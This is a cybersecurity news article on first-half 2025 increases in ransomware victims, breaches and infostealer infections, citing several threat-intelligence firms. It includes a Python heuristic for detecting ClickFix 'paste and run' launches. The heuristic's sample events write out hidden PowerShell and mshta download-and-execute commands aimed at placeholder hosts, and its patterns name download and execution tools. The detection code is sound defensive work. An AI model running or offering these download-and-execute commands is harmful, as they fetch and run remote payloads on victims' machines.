On the Rise: Ransomware Victims, Breaches, Infostealers



Researchers See ‘Acceleration’ in Existing Threats, Ongoing Criminal Success

Image: Cursor/Shutterstock

Cybercrime so far this year can be summarized as featuring “more of everything,” with researchers tracking increases in the number of ransomware and data breach victims, credentials stolen by infostealers, and new vulnerability disclosures with exploits coming to light.


The year so far has been a story of “an alarming acceleration in cyber threats,” said Ian Gray, vice president of cyber threat intelligence operations at Flashpoint. “We’ve seen an 800% increase in credential theft via information-stealing malware, making ‘identity’ a dominant attack vector,” he said. “With ransomware up 179% and data breaches surging 235%, the sheer scale of malicious activity is undeniable.”

The firm’s research, based on the first half of this year, also counted more than 20,000 new vulnerabilities coming to light, of which nearly 7,000 have publicly available exploits. “These trends combined pose a significant challenge to security teams, who must triage growing volumes of vulnerabilities, while attackers meticulously seek to weaponize exploit code,” says a Thursday report from Flashpoint.

The firm’s findings aren’t an outlier, including on the data breach front. The Identity Theft Resource Center, a U.S. nonprofit that assists breach victims, recently counted 1,732 data breach incidents affecting nearly 166 million individuals in the first half of this year. Compared with the first half of 2024, the number of reported U.S. data breaches rose 10%. If that pace holds through year’s end, 2025 will set a record for the number of known breached organizations.

Infostealers Surge

Experts said at least some of those breaches trace to the rising success of infostealers. A new report from threat intelligence firm Kela says that in the first half of this year, 2.7 million systems were infected by infostealers, leading to 204 million compromised credentials flooding the market. If those levels continue, 2025 is set to surpass the scale of infostealers seen in 2024, which involved more than 4.3 million systems being infected and 330 million credentials compromised.

Attackers continue to refine their tactics for tricking victims into installing infostealers, lately including via AI-generated videos posted to TikTok. Many of these lures use “paste and run” tactics, aka ClickFix or ClearFake attacks: the victim is shown a supposed problem together with its fix, and the fix typically involves pasting attacker-provided code into a Windows terminal session (see: Infostealer Attackers Deploy AI-Generated Videos on TikTok).
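The “paste and run” lure described above leaves a recognizable trace in process-creation telemetry, because the pasted text has to fetch something remote and execute it. The following Python is an added example written for this article, not detection content from Flashpoint, Kela or any other firm named here. It scores constructed Sysmon-style process-creation events (fields ParentImage, Image and CommandLine; all sample data, no real telemetry) for three things together: an interactive parent (explorer.exe, which owns the Win+R Run dialog, or a terminal shell; that parent set is an assumption), a scripting host as the child, and a command line that downloads and executes in-line, frequently with a hidden window or a base64 -EncodedCommand payload, which the code decodes before scanning. The indicator list, weights and alert threshold are assumptions to tune against a local baseline.

```python
"""Flag ClickFix / "paste and run" launches in process-creation telemetry.

Heuristic written for this article (not any vendor's detection content).
All events below are constructed samples, not real telemetry.
"""
import base64
import re

# Parents a human drives directly: explorer.exe owns the Run dialog; the rest are shells. (Assumption.)
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Indicator name -> (pattern, weight). Weights and threshold are assumptions; tune them locally.
INDICATORS = {
    "hidden_window":   (re.compile(r"-w[a-z]*\s+hidden", re.I), 2),
    "download_cradle": (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|webclient|curl|bitsadmin|certutil)\b", re.I), 2),
    "execute_fetched": (re.compile(r"\b(?:iex|invoke-expression|mshta|wscript|cscript)\b", re.I), 2),
    "remote_url":      (re.compile(r"https?://", re.I), 2),
    "encoded_command": (re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I), 1),
}
ALERT_THRESHOLD = 4
MUST_HAVE = {"execute_fetched", "hidden_window"}   # a plain download to disk is not enough on its own

_ENC_ARG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, or "" if absent/undecodable."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:          # binascii.Error is a ValueError: bad padding or length
        return ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> dict:
    """Score one process-creation event; returns indicators hit, score and the alert decision."""
    parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
    cmd = event["CommandLine"]
    text = cmd + "\n" + decode_encoded_command(cmd)   # scan raw and decoded text as one unit
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(text))
    score = sum(INDICATORS[n][1] for n in hits)
    alert = (parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS
             and score >= ALERT_THRESHOLD and bool(MUST_HAVE & set(hits)))
    return {"parent": parent, "image": image, "indicators": hits, "score": score, "alert": alert}


def scan(events):
    """Return the analysis of every event that trips the heuristic."""
    return [r for r in (analyze(e) for e in events) if r["alert"]]


def _b64_utf16(s: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it (used only for the sample)."""
    return base64.b64encode(s.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events; example.invalid hosts are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    # 1. Classic paste-and-run cradle launched from the Run dialog
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://fix.example.invalid/fix.ps1)"'},
    # 2. Same payload hidden behind -EncodedCommand
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc " + _b64_utf16("iex (irm https://fix.example.invalid/a.ps1)")},
    # 3. mshta pulling a remote HTA
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/check.hta"},
    # 4. Benign: an admin downloads an installer to disk, nothing is executed in-line
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -c "Invoke-WebRequest https://intranet.example.invalid/setup.msi -OutFile C:\\Temp\\setup.msi"'},
    # 5. Benign: plain interactive query
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-Service"},
    # 6. Same cradle from a service parent: out of scope for this rule (other rules should cover it)
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://fix.example.invalid/fix.ps1)"'},
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"ALERT score={r['score']} parent={r['parent']} image={r['image']} hits={r['indicators']}")
```

Requiring one of the “must-have” indicators (in-line execution or a hidden window) is what keeps the example from flagging an administrator who merely downloads an installer to disk (event 4), even though that command scores as high as the mshta case. The same cradle launched from a service parent (event 6) is deliberately left to other rules, since this heuristic is about a human pasting text.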

One challenge with infostealer infections is that they’re designed to harvest whatever sensitive data they might find on a system – cryptocurrency wallet addresses, access credentials for corporate systems and bank accounts, credit card data, cookies, passwords and more.

A thriving ecosystem connects sellers of this stolen information with buyers. Data from each infected system typically gets batched into a “log” and sold via automated “cloud of logs” marketplaces, forums and Telegram channels. Because this malware harvests corporate credentials among other data, “infostealers serve as precursors to advanced attacks, including ransomware and espionage,” Kela said. In other words, log buyers include nation-state hackers and extortionists.

Notable incidents this year in which attackers used credentials harvested by infostealers to gain initial access to a network affected the likes of Spanish telecommunications giant Telefónica and French telecom giant Orange, which were hit by the HellCat group in January and February respectively, Kela said.

“At Telefónica, HellCat compromised 15 Jira accounts, exfiltrating 24,000 employee records, 500,000 Jira tickets and over 2 GB of internal documents,” Kela said. “Six weeks later, HellCat gained month-long access to Orange via Raccoon-Stealer credentials, stealing 12,000 files (6.5 gigabytes) including financial, HR and network data. They also altered RIPE entries through an MFA-lacking ‘ripeadmin’ account, leaking thousands of documents,” it said, referring to the RIPE NCC not-for-profit regional internet registry for Europe, the Middle East and parts of Central Asia.

In March, the newly emerged Arkana ransomware group claimed to have breached Colorado-based internet service provider WideOpenWest, aka WOW, and threatened to leak stolen information pertaining to more than 400,000 subscribers unless WOW paid a ransom. “This attack stemmed from an infostealer compromising a WOW workstation in September 2024, which siphoned browser credentials,” Kela said.

Infostealer infections are a global problem. In the first half of this year, the top 10 countries from which victims hail, ranked by the quantity of uploaded logs, were led by India, the United States, Brazil, Indonesia and Pakistan, Flashpoint said.

Many infostealer users rent the software for $400 or less per month from one of at least 30 different service providers. The most used infostealer in the first half of this year was Lumma, which Flashpoint tied to 5 million infected hosts and devices, distantly followed by RedLine, StealC, Vidar and Agent Tesla, each with 329,000 or fewer infected hosts.

Infostealer-as-a-service providers’ terms and conditions often give them the right to keep any especially lucrative data, such as access credentials for cryptocurrency wallets or accounts.

Ransomware Counts More Victims

Ransomware attacks also appear to be trending upwards. That comes despite ongoing law enforcement disruptions of top groups and overall trust and stability issues. “Q2 has seen plenty of infighting between prominent and up-and-coming threat actors, claims of rivals uniting and major players hit by arrests,” said Chris Boyd, a threat researcher at Rapid7, in a recent report. “It makes sense, then, that affiliates would be in a state of flux, moving from one RaaS group to another, or even holding off altogether until the dust settles.”

Major players in recent months include Scattered Spider, which has socially engineered many name brands, including retailers and insurers, as well as Dragonforce, and healthcare-hacking-happy Qilin, Boyd said (see: Ransomware Thrives in Shook-Up Criminal Underworld).

In the first half of 2025, Kela counted 3,662 ransomware victims, either via public reports or claims posted to ransomware groups’ data-leak blogs. More than half of those victims are U.S.-based. The six-month total is already 70% of the 5,230 ransomware victims claimed by groups in all of 2024, meaning the number of known ransomware victims looks set to exceed last year’s level.

Flashpoint likewise found that the United States remains far and away the country most targeted by ransomware, based on known victims, accounting for what it said were 2,160 claimed victims in the first half of this year, followed by Canada with 249, Germany with 154, the United Kingdom with 148 and Italy with 96.

The ransomware victim count and demographics aren’t definitive, as groups only list a subset of nonpaying victims, sometimes list victims months later, and sometimes lie.

Security experts do keep track of their claims, to help measure the extent to which organizations have been hit by ransomware, which remains very difficult to fully quantify.

Based on what security experts can glean, “the scale of hidden activity remains significant,” with perhaps only one-fifth of all such attacks ever getting reported, said cybersecurity firm BlackFog in a Tuesday report.

Attacks that have come to light from Jan. 1 through July 31 reveal the damage each one can do to victims. “Among attacks where data theft details were available, the average volume of data exfiltrated was 858 gigabytes,” Flashpoint said. “This figure is based on 609 incidents where leak site posts included specific volume information. Ransom demands were disclosed in 44 cases, with the average demand exceeding $676,000.”
